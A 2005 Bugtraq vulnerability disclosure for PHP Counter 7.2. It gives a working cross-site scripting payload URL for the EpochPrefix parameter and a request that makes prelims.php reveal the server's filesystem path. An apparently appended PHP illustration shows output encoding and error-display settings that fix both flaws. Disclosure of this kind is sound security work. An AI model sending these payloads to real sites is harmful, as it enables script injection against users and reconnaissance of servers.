[39623] in bugtraq


Path Disclosure and XSS problem in PHP Counter 7.2

daemon@ATHENA.MIT.EDU (priestmaster)
Wed Jul 13 18:50:17 2005

Date: Wed, 13 Jul 2005 12:53:04 +0200
Message-Id: <200507131253.AA790037062@priestmaster.org>
From: "priestmaster" <priest@priestmaster.org>
Reply-To: <priest@priestmaster.org>
To: <bugtraq@securityfocus.com>



Hi,

I found two vulnerabilities in PHP Counter 7.2

PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php

First an XSS problem (file phpcounterxss.txt)
Second a Path disclosure vulnerability (file phpcounterdir.txt).

greets,

priestmaster

Mail: <priest@priestmaster.org>
URL:  http://www.priestmaster.org

Attachment: phpcountxss.txt

----------------------------------------------------------
---- Team priestmasters PHP Counter 7.2 XSS Advisory -----
----------------------------------------------------------

PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php

PHP Counter 7.2 does not filter "<>" tags in the EpochPrefix
parameter. Cross site scripting and HTML injection are possible.

Exploitation:

http://www.yourwebsite.org/CounterDirectory/index.php?Plugin=All%20Hits&EpochPrefix="></a></div><script>a=/XSS/%0aalert(a.source)</script>

The injected script is called multiple times.

XSS is hard to do because ' and " are filtered.

greets,

priestmaster

URL:   http://www.priestmaster.org
Email: priest@priestmaster.org

Attachment: phpcountdir.txt

------------------------------------------------------------
-------- Team priestmasters PHP Counter 7.2 Advisory -------
---------------- Path disclosure vulnerability -------------
------------------------------------------------------------

PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php

A Path disclosure vuln exists in prelims.php.
Exploitation is simple:

http://www.yoursite.com/CounterPath/prelims.php

Output looks like this:

Fatal error: Call to undefined function: getdawn()
in /home/.sites/165/site223/web/Counter/prelims.php on line 63

That's all :-)

priestmaster

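Added illustration for both attachments, not PHP Counter's own code: a stand-in for the quote-stripping filter the XSS advisory describes (assumed behaviour), set beside context-correct output encoding, plus the usual setting that stops the prelims.php error from revealing the filesystem path. Function names and the sample value are constructed for this example.

```php
<?php
// Hypothetical stand-in for the weak filter described in the advisory:
// it removes ' and " but leaves < and > untouched, so tags still pass.
function weakFilter(string $value): string
{
    return str_replace(["'", '"'], '', $value);
}

// Hardened form: encode every HTML-significant character for the context
// the parameter is written into (quoted attribute value or text node).
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Reviewer check over rendered output: a surviving raw "<script" means the
// sink is unprotected regardless of what the input filter claims to do.
function containsRawScriptTag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed input modelled on the shape of the advisory's payload.
$epochPrefix = '"></a></div><script>a=/XSS/' . "\n" . 'alert(a.source)</script>';

$weak = weakFilter($epochPrefix);
$safe = encodeForHtml($epochPrefix);

// Vulnerable sink: the filtered value is still placed into markup verbatim.
echo 'weak: <a href="?EpochPrefix=' . $weak . '">' . $weak . "</a>\n";
// Hardened sink: the same value is encoded at the point of output.
echo 'safe: <a href="?EpochPrefix=' . $safe . '">' . $safe . "</a>\n";

var_dump(containsRawScriptTag($weak));
var_dump(containsRawScriptTag($safe));

// Path disclosure mitigation for prelims.php-style fatal errors: never
// display errors to the client; log them server-side instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
```

Encoding at the output sink, rather than stripping selected characters on input, closes the attribute-breakout shown in the advisory; the ini settings belong in php.ini for production rather than per-script.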
